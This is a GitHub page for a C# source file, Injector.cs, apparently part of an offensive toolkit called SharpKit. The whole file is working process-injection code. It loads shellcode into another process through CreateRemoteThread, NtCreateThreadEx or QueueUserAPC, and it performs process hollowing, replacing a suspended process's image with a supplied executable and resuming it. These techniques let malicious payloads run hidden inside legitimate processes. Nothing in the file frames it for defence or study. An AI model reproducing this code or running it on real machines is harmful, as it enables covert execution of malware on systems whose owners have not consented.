-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathInjector.cs
More file actions
339 lines (285 loc) · 13.8 KB
/
Injector.cs
File metadata and controls
339 lines (285 loc) · 13.8 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;
namespace SharpKit;
public enum InjectionMethod
{
CreateRemoteThread,
QueueUserAPC,
ProcessHollowing,
NtCreateThreadEx
}
public sealed class InjectionResult
{
public bool Success { get; init; }
public uint ThreadId { get; init; }
public IntPtr RemoteBaseAddress { get; init; }
public int LastError { get; init; }
public string ErrorMessage { get; init; } = string.Empty;
}
public static class Injector
{
[DllImport("ntdll.dll")]
private static extern int NtCreateThreadEx(
out IntPtr threadHandle,
uint desiredAccess,
IntPtr objectAttributes,
IntPtr processHandle,
IntPtr startAddress,
IntPtr parameter,
bool createSuspended,
int stackZeroBits,
int sizeOfStack,
int maximumStackSize,
IntPtr attributeList);
[DllImport("ntdll.dll")]
private static extern int NtWriteVirtualMemory(
IntPtr processHandle,
IntPtr baseAddress,
byte[] buffer,
uint numberOfBytesToWrite,
out uint numberOfBytesWritten);
[DllImport("ntdll.dll")]
private static extern int NtAllocateVirtualMemory(
IntPtr processHandle,
ref IntPtr baseAddress,
IntPtr zeroBits,
ref IntPtr regionSize,
uint allocationType,
uint protect);
[DllImport("ntdll.dll")]
private static extern int NtProtectVirtualMemory(
IntPtr processHandle,
ref IntPtr baseAddress,
ref IntPtr numberOfBytesToProtect,
uint newAccessProtection,
out uint oldAccessProtection);
[DllImport("ntdll.dll")]
private static extern int NtUnmapViewOfSection(IntPtr processHandle, IntPtr baseAddress);
[DllImport("ntdll.dll")]
private static extern int NtQueryInformationProcess(
IntPtr processHandle,
int processInformationClass,
IntPtr processInformation,
uint processInformationLength,
out uint returnLength);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool GetThreadContext(IntPtr hThread, ref CONTEXT64 lpContext);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool SetThreadContext(IntPtr hThread, ref CONTEXT64 lpContext);
[StructLayout(LayoutKind.Sequential)]
private struct CONTEXT64
{
public ulong P1Home, P2Home, P3Home, P4Home, P5Home, P6Home;
public uint ContextFlags, MxCsr;
public ushort SegCs, SegDs, SegEs, SegFs, SegGs, SegSs;
public uint EFlags;
public ulong Dr0, Dr1, Dr2, Dr3, Dr6, Dr7;
public ulong Rax, Rcx, Rdx, Rbx, Rsp, Rbp, Rsi, Rdi;
public ulong R8, R9, R10, R11, R12, R13, R14, R15;
public ulong Rip;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
public byte[] FltSave;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 26)]
public ulong[] VectorRegister;
public ulong VectorControl;
public ulong DebugControl;
public ulong LastBranchToRip;
public ulong LastBranchFromRip;
public ulong LastExceptionToRip;
public ulong LastExceptionFromRip;
}
[StructLayout(LayoutKind.Sequential)]
private struct PROCESS_BASIC_INFORMATION
{
public IntPtr Reserved1;
public IntPtr PebBaseAddress;
public IntPtr Reserved2_0;
public IntPtr Reserved2_1;
public IntPtr UniqueProcessId;
public IntPtr Reserved3;
}
public static InjectionResult InjectCreateRemoteThread(int pid, byte[] shellcode)
{
var hProcess = Win32.OpenProcess(Win32.PROCESS_ALL_ACCESS, false, pid);
if (hProcess == IntPtr.Zero)
return new InjectionResult { Success = false, LastError = Marshal.GetLastWin32Error(), ErrorMessage = "OpenProcess failed" };
try
{
var remoteAddr = Win32.VirtualAllocEx(hProcess, IntPtr.Zero, (uint)shellcode.Length, Win32.MEM_COMMIT | Win32.MEM_RESERVE, Win32.PAGE_READWRITE);
if (remoteAddr == IntPtr.Zero)
return new InjectionResult { Success = false, LastError = Marshal.GetLastWin32Error(), ErrorMessage = "VirtualAllocEx failed" };
if (!Win32.WriteMemory(hProcess, remoteAddr, shellcode))
{
Win32.VirtualFreeEx(hProcess, remoteAddr, 0, Win32.MEM_RELEASE);
return new InjectionResult { Success = false, LastError = Marshal.GetLastWin32Error(), ErrorMessage = "WriteProcessMemory failed" };
}
Win32.VirtualProtectEx(hProcess, remoteAddr, (uint)shellcode.Length, Win32.PAGE_EXECUTE_READ, out _);
var hThread = Win32.CreateRemoteThread(hProcess, IntPtr.Zero, 0, remoteAddr, IntPtr.Zero, 0, out var threadId);
if (hThread == IntPtr.Zero)
{
Win32.VirtualFreeEx(hProcess, remoteAddr, 0, Win32.MEM_RELEASE);
return new InjectionResult { Success = false, LastError = Marshal.GetLastWin32Error(), ErrorMessage = "CreateRemoteThread failed" };
}
Win32.CloseHandle(hThread);
return new InjectionResult { Success = true, ThreadId = threadId, RemoteBaseAddress = remoteAddr };
}
finally
{
Win32.CloseHandle(hProcess);
}
}
public static InjectionResult InjectNtCreateThreadEx(int pid, byte[] shellcode)
{
var hProcess = Win32.OpenProcess(Win32.PROCESS_ALL_ACCESS, false, pid);
if (hProcess == IntPtr.Zero)
return new InjectionResult { Success = false, LastError = Marshal.GetLastWin32Error(), ErrorMessage = "OpenProcess failed" };
try
{
var remoteAddr = Win32.VirtualAllocEx(hProcess, IntPtr.Zero, (uint)shellcode.Length, Win32.MEM_COMMIT | Win32.MEM_RESERVE, Win32.PAGE_READWRITE);
if (remoteAddr == IntPtr.Zero)
return new InjectionResult { Success = false, LastError = Marshal.GetLastWin32Error(), ErrorMessage = "VirtualAllocEx failed" };
if (!Win32.WriteMemory(hProcess, remoteAddr, shellcode))
{
Win32.VirtualFreeEx(hProcess, remoteAddr, 0, Win32.MEM_RELEASE);
return new InjectionResult { Success = false, LastError = Marshal.GetLastWin32Error(), ErrorMessage = "WriteProcessMemory failed" };
}
Win32.VirtualProtectEx(hProcess, remoteAddr, (uint)shellcode.Length, Win32.PAGE_EXECUTE_READ, out _);
var status = NtCreateThreadEx(out var hThread, 0x1FFFFF, IntPtr.Zero, hProcess, remoteAddr, IntPtr.Zero, false, 0, 0, 0, IntPtr.Zero);
if (status < 0 || hThread == IntPtr.Zero)
{
Win32.VirtualFreeEx(hProcess, remoteAddr, 0, Win32.MEM_RELEASE);
return new InjectionResult { Success = false, LastError = status, ErrorMessage = $"NtCreateThreadEx failed: 0x{status:X8}" };
}
Win32.CloseHandle(hThread);
return new InjectionResult { Success = true, RemoteBaseAddress = remoteAddr };
}
finally
{
Win32.CloseHandle(hProcess);
}
}
public static InjectionResult InjectQueueUserAPC(int pid, byte[] shellcode)
{
var hProcess = Win32.OpenProcess(Win32.PROCESS_ALL_ACCESS, false, pid);
if (hProcess == IntPtr.Zero)
return new InjectionResult { Success = false, LastError = Marshal.GetLastWin32Error(), ErrorMessage = "OpenProcess failed" };
try
{
var remoteAddr = Win32.VirtualAllocEx(hProcess, IntPtr.Zero, (uint)shellcode.Length, Win32.MEM_COMMIT | Win32.MEM_RESERVE, Win32.PAGE_READWRITE);
if (remoteAddr == IntPtr.Zero)
return new InjectionResult { Success = false, LastError = Marshal.GetLastWin32Error(), ErrorMessage = "VirtualAllocEx failed" };
if (!Win32.WriteMemory(hProcess, remoteAddr, shellcode))
{
Win32.VirtualFreeEx(hProcess, remoteAddr, 0, Win32.MEM_RELEASE);
return new InjectionResult { Success = false, LastError = Marshal.GetLastWin32Error(), ErrorMessage = "WriteProcessMemory failed" };
}
Win32.VirtualProtectEx(hProcess, remoteAddr, (uint)shellcode.Length, Win32.PAGE_EXECUTE_READ, out _);
var process = Process.GetProcessById(pid);
bool queued = false;
foreach (ProcessThread thread in process.Threads)
{
var hThread = Win32.OpenThread(0x0020, false, (uint)thread.Id);
if (hThread == IntPtr.Zero) continue;
try
{
var result = Win32.QueueUserAPC(remoteAddr, hThread, IntPtr.Zero);
if (result != IntPtr.Zero)
queued = true;
}
finally
{
Win32.CloseHandle(hThread);
}
}
if (!queued)
{
Win32.VirtualFreeEx(hProcess, remoteAddr, 0, Win32.MEM_RELEASE);
return new InjectionResult { Success = false, ErrorMessage = "QueueUserAPC failed for all threads" };
}
return new InjectionResult { Success = true, RemoteBaseAddress = remoteAddr };
}
finally
{
Win32.CloseHandle(hProcess);
}
}
public static InjectionResult HollowProcess(string targetPath, byte[] peBytes)
{
var si = new Win32.STARTUPINFO { cb = (uint)Marshal.SizeOf<Win32.STARTUPINFO>() };
var sa = new Win32.SECURITY_ATTRIBUTES { nLength = Marshal.SizeOf<Win32.SECURITY_ATTRIBUTES>() };
if (!Win32.CreateProcess(targetPath, targetPath, ref sa, ref sa, false, Win32.CREATE_SUSPENDED | Win32.CREATE_NO_WINDOW, IntPtr.Zero, null, ref si, out var pi))
return new InjectionResult { Success = false, LastError = Marshal.GetLastWin32Error(), ErrorMessage = "CreateProcess failed" };
try
{
var pbiSize = (uint)Marshal.SizeOf<PROCESS_BASIC_INFORMATION>();
var pbiBuffer = Marshal.AllocHGlobal((int)pbiSize);
try
{
NtQueryInformationProcess(pi.hProcess, 0, pbiBuffer, pbiSize, out _);
var pbi = Marshal.PtrToStructure<PROCESS_BASIC_INFORMATION>(pbiBuffer);
var pebImageBaseOffset = pbi.PebBaseAddress + 0x10;
var imageBaseBytes = Win32.ReadMemory(pi.hProcess, pebImageBaseOffset, 8);
var originalBase = (IntPtr)BitConverter.ToInt64(imageBaseBytes, 0);
NtUnmapViewOfSection(pi.hProcess, originalBase);
var peHeader = peBytes.Take(0x40).ToArray();
var e_lfanew = BitConverter.ToInt32(peHeader, 0x3C);
var optHeaderOffset = e_lfanew + 4 + 20;
var imageBase = BitConverter.ToInt64(peBytes, optHeaderOffset + 24);
var sizeOfImage = BitConverter.ToInt32(peBytes, optHeaderOffset + 56);
var sizeOfHeaders = BitConverter.ToInt32(peBytes, optHeaderOffset + 60);
var newBase = (IntPtr)imageBase;
var regionSize = (IntPtr)sizeOfImage;
NtAllocateVirtualMemory(pi.hProcess, ref newBase, IntPtr.Zero, ref regionSize, Win32.MEM_COMMIT | Win32.MEM_RESERVE, Win32.PAGE_EXECUTE_READWRITE);
Win32.WriteMemory(pi.hProcess, newBase, peBytes.Take(sizeOfHeaders).ToArray());
var numSections = BitConverter.ToInt16(peBytes, e_lfanew + 4 + 2);
var sectionHeaderOffset = optHeaderOffset + BitConverter.ToInt16(peBytes, e_lfanew + 4 + 16);
for (int i = 0; i < numSections; i++)
{
var sectionOffset = sectionHeaderOffset + i * 40;
var virtualAddress = BitConverter.ToInt32(peBytes, sectionOffset + 12);
var rawSize = BitConverter.ToInt32(peBytes, sectionOffset + 16);
var rawOffset = BitConverter.ToInt32(peBytes, sectionOffset + 20);
if (rawSize == 0) continue;
var sectionData = peBytes.Skip(rawOffset).Take(rawSize).ToArray();
Win32.WriteMemory(pi.hProcess, newBase + virtualAddress, sectionData);
}
var imageBaseBuffer = BitConverter.GetBytes(newBase.ToInt64());
Win32.WriteMemory(pi.hProcess, pebImageBaseOffset, imageBaseBuffer);
var ctx = new CONTEXT64 { ContextFlags = 0x10001B };
ctx.FltSave = new byte[512];
ctx.VectorRegister = new ulong[26];
GetThreadContext(pi.hThread, ref ctx);
var entryPointRva = BitConverter.ToInt32(peBytes, optHeaderOffset + 16);
ctx.Rcx = (ulong)(newBase.ToInt64() + entryPointRva);
SetThreadContext(pi.hThread, ref ctx);
Win32.ResumeThread(pi.hThread);
return new InjectionResult { Success = true, RemoteBaseAddress = newBase, ThreadId = pi.dwThreadId };
}
finally
{
Marshal.FreeHGlobal(pbiBuffer);
}
}
catch (Exception ex)
{
Win32.TerminateProcess(pi.hProcess, 1);
return new InjectionResult { Success = false, ErrorMessage = ex.Message };
}
finally
{
Win32.CloseHandle(pi.hThread);
Win32.CloseHandle(pi.hProcess);
}
}
public static InjectionResult Inject(int pid, byte[] shellcode, InjectionMethod method)
{
return method switch
{
InjectionMethod.CreateRemoteThread => InjectCreateRemoteThread(pid, shellcode),
InjectionMethod.QueueUserAPC => InjectQueueUserAPC(pid, shellcode),
InjectionMethod.NtCreateThreadEx => InjectNtCreateThreadEx(pid, shellcode),
_ => new InjectionResult { Success = false, ErrorMessage = $"Unsupported method: {method}" }
};
}
}